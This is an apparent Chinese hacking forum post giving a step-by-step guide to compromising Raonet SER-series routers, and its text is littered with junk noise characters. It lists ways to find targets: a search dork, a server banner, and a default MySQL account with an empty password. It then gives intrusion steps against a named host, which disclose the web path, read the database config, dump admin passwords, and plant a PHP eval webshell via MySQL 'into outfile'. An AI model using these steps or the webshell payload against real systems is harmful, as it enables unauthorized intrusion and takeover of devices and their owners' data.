寻找存在漏洞的路由器方法:
" ~/ N6 u7 j' Q% @
, |1 C8 Z3 g7 Z2 A1:google搜索'Raonet Subscriber Ethernet Router'2 a m6 `1 W8 M/ r
0 {$ f( g" f% L: b) z/ |2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% g/ {2 x3 ^1 W* }, x( a1 A9 Q2 [2 ^! W$ w+ V
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。+ ]$ A, O+ b* S1 W% ]2 y4 N' a
9 X3 V( t, u% k" d2 u2 X//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......4 Y5 }; M$ O3 H) z
' a [$ H% B6 E% c1 x 4 l1 ^$ b& Q% n) q
; b& m8 \! ~9 W$ {9 ]: }1 c入侵步骤:
4 z+ q) N* U5 h8 h3 t
4 x& n/ s! u6 k/ I; V- }/ S; g* I1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; n: c0 l; ^. L4 Z8 W q* j
8 e% H5 \+ X" ]# N2 {
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; L8 S, r) J+ l% C" U5 r
3:得到密码后连接,查看GUI管理密码:$ v$ l: r) F7 y8 W
use ser_5009 D8 j ]( K# K$ L; J. ~
select id,passwd from user;
, X) W7 b/ X. c1 u2 R2 v4:通过数据库写入webshell,执行命令:5 t$ _/ Z& \* w5 C0 J1 x, p, x
use mysql;9 I3 X. w4 B/ u4 s0 h) ^* i* n
create table ok(cmd TEXT);2 ]5 z% u4 Y3 `1 l; e g5 B8 T
insert into ok values("<?php @eval($_POST[cmd])?>");# ^2 K1 }9 }* D4 y( u0 {( a! W
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
* e7 W+ U4 A% Bdrop table ok;
0 x) ?0 u0 d/ {" P: p5 w) V7 x0 [. I9 l0 u2 j% ^3 w# n }
5:连接后门shell.php
' T$ @" \1 }5 g. I7 D5 Y! ?
6 [6 g6 z d$ p6. 搞定!
3 I" ]* u1 V i! G$ o+ x! ^ S) q% |; l
|